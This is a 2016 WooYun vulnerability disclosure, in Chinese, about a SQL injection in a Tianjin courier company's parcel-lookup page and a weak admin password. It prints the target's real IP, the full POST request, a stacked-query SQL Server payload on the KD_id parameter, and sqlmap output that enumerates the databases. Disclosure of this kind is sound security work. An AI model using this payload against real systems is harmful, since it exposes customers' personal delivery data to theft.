漏洞概要 关注数(1) 关注此漏洞
缺陷编号: WooYun-2016-184238
漏洞标题: 天津飞康达速递服务有限公司某处sql注入可泄露至少十万快递信息,再附加后台弱口令一发
相关厂商: 天津飞康达速递服务有限公司
漏洞作者: Adoubi
提交时间: 2016-03-14 15:46
公开时间: 2016-04-28 15:46
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: asp+sqlserver注射
漏洞详情
披露状态:
2016-03-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-28: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
天津飞康达速递服务有限公司某处sql注入可泄露所有快递信息
详细说明:
问题出在他的快递查询页面 post注入
http://219.232.255.138:800/
抓个包。。
POST /chaxun.asp HTTP/1.1
Host: 219.232.255.138:800
Content-Length: 12
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://219.232.255.138:800
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://219.232.255.138:800/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSSRBDCQT=NDJHCIBCNFFIBOIDDMKMLLIJ
KD_id=132q32
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: KD_id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: KD_id=132q32'); WAITFOR DELAY '0:0:5';--
---
[15:58:10] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[15:58:10] [INFO] fetching database names
[15:58:10] [INFO] fetching number of databases
[15:58:10] [INFO] resumed: 7
[15:58:10] [INFO] resumed: master/n
[15:58:10] [INFO] resumed: model
[15:58:10] [INFO] resumed: msdb
[15:58:10] [INFO] resumed: ReportServer
[15:58:10] [INFO] resumed: ReportServerTempDB
[15:58:10] [INFO] resumed: tempdb
[15:58:10] [INFO] resumed: x10
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] x10
剩下的我就不继续注入了,能得到所有快递信息的哦,个人信息泄露绝对多哦
http://www.fkd.com.cn/admin/
另外附加后台弱口令一发
漏洞证明:
RS
修复方案:
加过滤啊亲
版权声明:转载请注明来源 Adoubi@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
评价
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论